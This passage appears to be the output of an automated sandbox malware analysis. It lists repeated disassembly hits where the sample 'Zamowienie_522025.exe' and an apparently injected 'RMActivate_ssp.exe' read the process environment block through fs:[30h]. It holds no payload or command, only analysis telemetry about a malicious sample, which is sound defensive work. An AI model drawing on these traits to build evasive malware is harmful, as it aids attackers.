Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324D972B mov eax, dword ptr fs:[00000030h]	9_2_324D972B
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32409730 mov eax, dword ptr fs:[00000030h]	9_2_32409730
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32409730 mov eax, dword ptr fs:[00000030h]	9_2_32409730
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32445734 mov eax, dword ptr fs:[00000030h]	9_2_32445734
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324EB73C mov eax, dword ptr fs:[00000030h]	9_2_324EB73C
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324EB73C mov eax, dword ptr fs:[00000030h]	9_2_324EB73C
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324EB73C mov eax, dword ptr fs:[00000030h]	9_2_324EB73C
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324EB73C mov eax, dword ptr fs:[00000030h]	9_2_324EB73C
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241973A mov eax, dword ptr fs:[00000030h]	9_2_3241973A
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241973A mov eax, dword ptr fs:[00000030h]	9_2_3241973A
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324157C0 mov eax, dword ptr fs:[00000030h]	9_2_324157C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324157C0 mov eax, dword ptr fs:[00000030h]	9_2_324157C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324157C0 mov eax, dword ptr fs:[00000030h]	9_2_324157C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241D7E0 mov ecx, dword ptr fs:[00000030h]	9_2_3241D7E0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324CF78A mov eax, dword ptr fs:[00000030h]	9_2_324CF78A
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324997A9 mov eax, dword ptr fs:[00000030h]	9_2_324997A9
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3249F7AF mov eax, dword ptr fs:[00000030h]	9_2_3249F7AF
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3249F7AF mov eax, dword ptr fs:[00000030h]	9_2_3249F7AF
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3249F7AF mov eax, dword ptr fs:[00000030h]	9_2_3249F7AF
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3249F7AF mov eax, dword ptr fs:[00000030h]	9_2_3249F7AF
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3249F7AF mov eax, dword ptr fs:[00000030h]	9_2_3249F7AF
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243D7B0 mov eax, dword ptr fs:[00000030h]	9_2_3243D7B0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324E37B6 mov eax, dword ptr fs:[00000030h]	9_2_324E37B6
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F7BA mov eax, dword ptr fs:[00000030h]	9_2_3240F7BA
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F7BA mov eax, dword ptr fs:[00000030h]	9_2_3240F7BA
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F7BA mov eax, dword ptr fs:[00000030h]	9_2_3240F7BA
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F7BA mov eax, dword ptr fs:[00000030h]	9_2_3240F7BA
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F7BA mov eax, dword ptr fs:[00000030h]	9_2_3240F7BA
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F7BA mov eax, dword ptr fs:[00000030h]	9_2_3240F7BA
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F7BA mov eax, dword ptr fs:[00000030h]	9_2_3240F7BA
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F7BA mov eax, dword ptr fs:[00000030h]	9_2_3240F7BA
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F7BA mov eax, dword ptr fs:[00000030h]	9_2_3240F7BA
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324CD7B0 mov eax, dword ptr fs:[00000030h]	9_2_324CD7B0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324CD7B0 mov eax, dword ptr fs:[00000030h]	9_2_324CD7B0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241B440 mov eax, dword ptr fs:[00000030h]	9_2_3241B440
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241B440 mov eax, dword ptr fs:[00000030h]	9_2_3241B440
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241B440 mov eax, dword ptr fs:[00000030h]	9_2_3241B440
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241B440 mov eax, dword ptr fs:[00000030h]	9_2_3241B440
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241B440 mov eax, dword ptr fs:[00000030h]	9_2_3241B440
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241B440 mov eax, dword ptr fs:[00000030h]	9_2_3241B440
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BB450 mov eax, dword ptr fs:[00000030h]	9_2_324BB450
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BB450 mov eax, dword ptr fs:[00000030h]	9_2_324BB450
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BB450 mov eax, dword ptr fs:[00000030h]	9_2_324BB450
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BB450 mov eax, dword ptr fs:[00000030h]	9_2_324BB450
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324CF453 mov eax, dword ptr fs:[00000030h]	9_2_324CF453
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32411460 mov eax, dword ptr fs:[00000030h]	9_2_32411460
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32411460 mov eax, dword ptr fs:[00000030h]	9_2_32411460
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32411460 mov eax, dword ptr fs:[00000030h]	9_2_32411460
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32411460 mov eax, dword ptr fs:[00000030h]	9_2_32411460
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32411460 mov eax, dword ptr fs:[00000030h]	9_2_32411460
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3242F460 mov eax, dword ptr fs:[00000030h]	9_2_3242F460
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3242F460 mov eax, dword ptr fs:[00000030h]	9_2_3242F460
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3242F460 mov eax, dword ptr fs:[00000030h]	9_2_3242F460
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3242F460 mov eax, dword ptr fs:[00000030h]	9_2_3242F460
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3242F460 mov eax, dword ptr fs:[00000030h]	9_2_3242F460
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3242F460 mov eax, dword ptr fs:[00000030h]	9_2_3242F460
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324E547F mov eax, dword ptr fs:[00000030h]	9_2_324E547F
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243340D mov eax, dword ptr fs:[00000030h]	9_2_3243340D
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32497410 mov eax, dword ptr fs:[00000030h]	9_2_32497410
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324E54DB mov eax, dword ptr fs:[00000030h]	9_2_324E54DB
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324B94E0 mov eax, dword ptr fs:[00000030h]	9_2_324B94E0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240B480 mov eax, dword ptr fs:[00000030h]	9_2_3240B480
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32419486 mov eax, dword ptr fs:[00000030h]	9_2_32419486
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32419486 mov eax, dword ptr fs:[00000030h]	9_2_32419486
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324074B0 mov eax, dword ptr fs:[00000030h]	9_2_324074B0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324074B0 mov eax, dword ptr fs:[00000030h]	9_2_324074B0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324434B0 mov eax, dword ptr fs:[00000030h]	9_2_324434B0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BB550 mov eax, dword ptr fs:[00000030h]	9_2_324BB550
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BB550 mov eax, dword ptr fs:[00000030h]	9_2_324BB550
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BB550 mov eax, dword ptr fs:[00000030h]	9_2_324BB550
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240B562 mov eax, dword ptr fs:[00000030h]	9_2_3240B562
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3244B570 mov eax, dword ptr fs:[00000030h]	9_2_3244B570
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3244B570 mov eax, dword ptr fs:[00000030h]	9_2_3244B570
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32447505 mov eax, dword ptr fs:[00000030h]	9_2_32447505
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32447505 mov ecx, dword ptr fs:[00000030h]	9_2_32447505
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324CB52F mov eax, dword ptr fs:[00000030h]	9_2_324CB52F
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BF525 mov eax, dword ptr fs:[00000030h]	9_2_324BF525
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BF525 mov eax, dword ptr fs:[00000030h]	9_2_324BF525
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BF525 mov eax, dword ptr fs:[00000030h]	9_2_324BF525
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BF525 mov eax, dword ptr fs:[00000030h]	9_2_324BF525
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BF525 mov eax, dword ptr fs:[00000030h]	9_2_324BF525
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BF525 mov eax, dword ptr fs:[00000030h]	9_2_324BF525
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BF525 mov eax, dword ptr fs:[00000030h]	9_2_324BF525
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3244D530 mov eax, dword ptr fs:[00000030h]	9_2_3244D530
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3244D530 mov eax, dword ptr fs:[00000030h]	9_2_3244D530
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241D534 mov eax, dword ptr fs:[00000030h]	9_2_3241D534
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241D534 mov eax, dword ptr fs:[00000030h]	9_2_3241D534
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241D534 mov eax, dword ptr fs:[00000030h]	9_2_3241D534
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241D534 mov eax, dword ptr fs:[00000030h]	9_2_3241D534
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241D534 mov eax, dword ptr fs:[00000030h]	9_2_3241D534
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241D534 mov eax, dword ptr fs:[00000030h]	9_2_3241D534
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324E5537 mov eax, dword ptr fs:[00000030h]	9_2_324E5537
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324455C0 mov eax, dword ptr fs:[00000030h]	9_2_324455C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324E55C9 mov eax, dword ptr fs:[00000030h]	9_2_324E55C9
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3248D5D0 mov eax, dword ptr fs:[00000030h]	9_2_3248D5D0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3248D5D0 mov ecx, dword ptr fs:[00000030h]	9_2_3248D5D0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324395DA mov eax, dword ptr fs:[00000030h]	9_2_324395DA
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324E35D7 mov eax, dword ptr fs:[00000030h]	9_2_324E35D7
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324E35D7 mov eax, dword ptr fs:[00000030h]	9_2_324E35D7
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324E35D7 mov eax, dword ptr fs:[00000030h]	9_2_324E35D7
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324315F4 mov eax, dword ptr fs:[00000030h]	9_2_324315F4
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324315F4 mov eax, dword ptr fs:[00000030h]	9_2_324315F4
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324315F4 mov eax, dword ptr fs:[00000030h]	9_2_324315F4
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324315F4 mov eax, dword ptr fs:[00000030h]	9_2_324315F4
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324315F4 mov eax, dword ptr fs:[00000030h]	9_2_324315F4
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324315F4 mov eax, dword ptr fs:[00000030h]	9_2_324315F4
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240758F mov eax, dword ptr fs:[00000030h]	9_2_3240758F
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240758F mov eax, dword ptr fs:[00000030h]	9_2_3240758F
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240758F mov eax, dword ptr fs:[00000030h]	9_2_3240758F
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3249B594 mov eax, dword ptr fs:[00000030h]	9_2_3249B594
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3249B594 mov eax, dword ptr fs:[00000030h]	9_2_3249B594
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324315A9 mov eax, dword ptr fs:[00000030h]	9_2_324315A9
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324315A9 mov eax, dword ptr fs:[00000030h]	9_2_324315A9
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324315A9 mov eax, dword ptr fs:[00000030h]	9_2_324315A9
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324315A9 mov eax, dword ptr fs:[00000030h]	9_2_324315A9
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324315A9 mov eax, dword ptr fs:[00000030h]	9_2_324315A9
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324A35BA mov eax, dword ptr fs:[00000030h]	9_2_324A35BA
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324A35BA mov eax, dword ptr fs:[00000030h]	9_2_324A35BA
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324A35BA mov eax, dword ptr fs:[00000030h]	9_2_324A35BA
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324A35BA mov eax, dword ptr fs:[00000030h]	9_2_324A35BA
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324CF5BE mov eax, dword ptr fs:[00000030h]	9_2_324CF5BE
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243F5B0 mov eax, dword ptr fs:[00000030h]	9_2_3243F5B0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243F5B0 mov eax, dword ptr fs:[00000030h]	9_2_3243F5B0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243F5B0 mov eax, dword ptr fs:[00000030h]	9_2_3243F5B0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243F5B0 mov eax, dword ptr fs:[00000030h]	9_2_3243F5B0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243F5B0 mov eax, dword ptr fs:[00000030h]	9_2_3243F5B0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243F5B0 mov eax, dword ptr fs:[00000030h]	9_2_3243F5B0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243F5B0 mov eax, dword ptr fs:[00000030h]	9_2_3243F5B0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243F5B0 mov eax, dword ptr fs:[00000030h]	9_2_3243F5B0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243F5B0 mov eax, dword ptr fs:[00000030h]	9_2_3243F5B0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324AD5B0 mov eax, dword ptr fs:[00000030h]	9_2_324AD5B0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324AD5B0 mov eax, dword ptr fs:[00000030h]	9_2_324AD5B0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32409A40 mov ecx, dword ptr fs:[00000030h]	9_2_32409A40
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324A3A78 mov eax, dword ptr fs:[00000030h]	9_2_324A3A78
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324A3A78 mov eax, dword ptr fs:[00000030h]	9_2_324A3A78
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324A3A78 mov eax, dword ptr fs:[00000030h]	9_2_324A3A78
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324A3A78 mov eax, dword ptr fs:[00000030h]	9_2_324A3A78
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324A3A78 mov eax, dword ptr fs:[00000030h]	9_2_324A3A78
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324A3A78 mov eax, dword ptr fs:[00000030h]	9_2_324A3A78
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BBA0B mov eax, dword ptr fs:[00000030h]	9_2_324BBA0B
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BBA0B mov eax, dword ptr fs:[00000030h]	9_2_324BBA0B
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BBA0B mov eax, dword ptr fs:[00000030h]	9_2_324BBA0B
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BBA0B mov eax, dword ptr fs:[00000030h]	9_2_324BBA0B
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32445A01 mov eax, dword ptr fs:[00000030h]	9_2_32445A01
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32445A01 mov ecx, dword ptr fs:[00000030h]	9_2_32445A01
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32445A01 mov eax, dword ptr fs:[00000030h]	9_2_32445A01
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32445A01 mov eax, dword ptr fs:[00000030h]	9_2_32445A01
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324CFA02 mov eax, dword ptr fs:[00000030h]	9_2_324CFA02
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240BA10 mov eax, dword ptr fs:[00000030h]	9_2_3240BA10
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3248DA1D mov eax, dword ptr fs:[00000030h]	9_2_3248DA1D
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324B7A11 mov edi, dword ptr fs:[00000030h]	9_2_324B7A11
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32439A18 mov ecx, dword ptr fs:[00000030h]	9_2_32439A18
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243DA20 mov eax, dword ptr fs:[00000030h]	9_2_3243DA20
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243DA20 mov eax, dword ptr fs:[00000030h]	9_2_3243DA20
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241BA30 mov eax, dword ptr fs:[00000030h]	9_2_3241BA30
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241BA30 mov ecx, dword ptr fs:[00000030h]	9_2_3241BA30
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241BA30 mov eax, dword ptr fs:[00000030h]	9_2_3241BA30
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241BA30 mov eax, dword ptr fs:[00000030h]	9_2_3241BA30
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241BA30 mov eax, dword ptr fs:[00000030h]	9_2_3241BA30
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241BA30 mov eax, dword ptr fs:[00000030h]	9_2_3241BA30
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32491ACB mov eax, dword ptr fs:[00000030h]	9_2_32491ACB
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32491ACB mov ecx, dword ptr fs:[00000030h]	9_2_32491ACB
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243BADA mov eax, dword ptr fs:[00000030h]	9_2_3243BADA
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324A5AD0 mov eax, dword ptr fs:[00000030h]	9_2_324A5AD0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240BAE0 mov eax, dword ptr fs:[00000030h]	9_2_3240BAE0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32407A80 mov eax, dword ptr fs:[00000030h]	9_2_32407A80
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32407A80 mov eax, dword ptr fs:[00000030h]	9_2_32407A80
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32407A80 mov eax, dword ptr fs:[00000030h]	9_2_32407A80
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324CFA87 mov eax, dword ptr fs:[00000030h]	9_2_324CFA87
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241BAA0 mov eax, dword ptr fs:[00000030h]	9_2_3241BAA0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241BAA0 mov eax, dword ptr fs:[00000030h]	9_2_3241BAA0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240FAA4 mov ecx, dword ptr fs:[00000030h]	9_2_3240FAA4
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BDAAC mov ecx, dword ptr fs:[00000030h]	9_2_324BDAAC
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BDAAC mov ecx, dword ptr fs:[00000030h]	9_2_324BDAAC
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BDAAC mov eax, dword ptr fs:[00000030h]	9_2_324BDAAC
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A2E388 mov eax, dword ptr fs:[00000030h]	15_2_03A2E388
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A2E388 mov eax, dword ptr fs:[00000030h]	15_2_03A2E388
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A2E388 mov eax, dword ptr fs:[00000030h]	15_2_03A2E388
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A5438F mov eax, dword ptr fs:[00000030h]	15_2_03A5438F
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A5438F mov eax, dword ptr fs:[00000030h]	15_2_03A5438F
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A28397 mov eax, dword ptr fs:[00000030h]	15_2_03A28397
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A28397 mov eax, dword ptr fs:[00000030h]	15_2_03A28397
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A28397 mov eax, dword ptr fs:[00000030h]	15_2_03A28397
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A403E9 mov eax, dword ptr fs:[00000030h]	15_2_03A403E9
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A403E9 mov eax, dword ptr fs:[00000030h]	15_2_03A403E9
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A403E9 mov eax, dword ptr fs:[00000030h]	15_2_03A403E9
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A403E9 mov eax, dword ptr fs:[00000030h]	15_2_03A403E9
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A403E9 mov eax, dword ptr fs:[00000030h]	15_2_03A403E9
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A403E9 mov eax, dword ptr fs:[00000030h]	15_2_03A403E9
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A403E9 mov eax, dword ptr fs:[00000030h]	15_2_03A403E9
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A403E9 mov eax, dword ptr fs:[00000030h]	15_2_03A403E9
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]	15_2_03A4E3F0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]	15_2_03A4E3F0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]	15_2_03A4E3F0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A663FF mov eax, dword ptr fs:[00000030h]	15_2_03A663FF
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AEC3CD mov eax, dword ptr fs:[00000030h]	15_2_03AEC3CD
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	15_2_03A3A3C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	15_2_03A3A3C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	15_2_03A3A3C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	15_2_03A3A3C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	15_2_03A3A3C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	15_2_03A3A3C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A383C0 mov eax, dword ptr fs:[00000030h]	15_2_03A383C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A383C0 mov eax, dword ptr fs:[00000030h]	15_2_03A383C0
